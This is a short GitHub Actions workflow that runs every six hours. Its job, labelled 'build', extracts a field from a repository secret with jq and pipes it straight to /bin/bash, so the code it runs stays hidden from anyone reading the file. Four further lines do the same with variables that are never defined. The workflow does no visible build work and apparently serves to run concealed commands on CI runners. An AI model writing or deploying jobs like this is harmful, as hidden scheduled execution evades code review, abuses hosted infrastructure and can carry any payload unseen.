name: chengliangqiang5432

on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengliangqiang5432
        env:
          lp1: ${{ secrets.lp1 }}
        run: |
          echo $lp1 | jq -r .ps2859 | /bin/bash
          echo $c26 | jq -r .oxnu4389 | /bin/bash
          echo $rd79 | jq -r .kcft7866 | /bin/bash
          echo $q1 | jq -r .dpk81 | /bin/bash
          echo $pxj098 | jq -r .gl4 | /bin/bash

